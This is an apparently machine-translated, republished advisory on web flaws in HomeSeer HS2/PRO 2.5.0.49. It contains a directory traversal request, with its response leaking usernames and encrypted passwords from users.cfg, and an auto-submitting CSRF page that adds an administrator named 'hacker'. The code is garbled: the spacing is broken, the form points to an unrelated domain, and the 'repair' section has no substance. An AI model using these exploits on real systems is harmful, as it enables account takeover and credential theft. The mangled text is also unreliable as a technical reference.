Multiple defects and repair of HomeSeer HS2 and HomeSeer PRO

HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)
Author: Silent_Dream
: Http://www.homeseer.com/pub/setuphs2_5_0_49.exe
Affected Versions: 2.5.0.49
Test Platform: Win XP
Note: This affects both HomeSeer HS2 and HomeSeer PRO.
# Previusly reported XSS attack vector (elog) reported to CERT was fixed in 2.5.0.49 update.
A) directory traversal: Retrieving the users. cfg file which contains HomeSeer usernames, access levels, and encrypted passwords.
Ncat 192.168.0.1 80
GET/.. \ Config \ users. cfg HTTP/1.0
HTTP/1.0 200 OK
Server: HomeSeer
Content-Type: application/
Accept-Ranges: bytes
Content-Length: 195
2
EFBBBF6775657374, efbbbf4853454e4332774b51364d614c53436d534d41697a48617213514d513
D3D, EFBBBF31
EFBBBF64656661756C74, EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E6
3773D3D, EFBBBF36
B) Cross-Site Request Forgery: It is possible to add a new admin user by tricking logged-in admin to visit a malicious URL.
This poc can be used to add an administrator with a name and password of hacker.
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> HomeSeer CSRF Exploit to add new administrator account </H2>
<Form method = "POST" name = "form0" action = "http://www.bkjia.com/ctrl">
<Input type = "hidden" name = "wuNEWUSERNAME" value = "hacker"/>
<Input type = "hidden" name = "wuNEWUSERPASS" value = "hacked"/>
<Input type = "hidden" name = "wuNEWUSERRIGHTS" value = "Admin"/>
<Input type = "hidden" name = "wuNEWUSERADD" value = "Add"/>
<Input type = "hidden" name = "stay_on_webusers" value = "Hello"/>
</Form>
</Body>
</Html>
Repair
 
Enhanced verification